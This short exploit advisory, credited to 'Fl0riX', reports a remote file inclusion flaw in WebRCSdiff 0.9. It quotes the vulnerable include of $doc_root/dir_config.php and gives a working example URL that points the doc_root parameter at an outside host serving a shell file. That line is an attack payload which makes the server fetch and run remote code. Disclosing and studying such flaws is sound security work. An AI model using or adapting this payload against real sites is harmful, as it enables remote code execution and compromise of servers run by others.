|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26  |  ======================================================== = Author: Fl0riX - Bug Researchers = ApplicationName : WebRCSdiff 0.9 = VulnerableType: Remote File Inclusion = Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download = Risk : High = Infection: Uzaktan Dosya Dahil edilebilir. ======================================================== =  Error c0d3;  include ("$doc_root/dir_config.php"); ======================================================== =  Example;  site/viewver?doc_root=http://fl0rix/shell.txt? ========================================================  |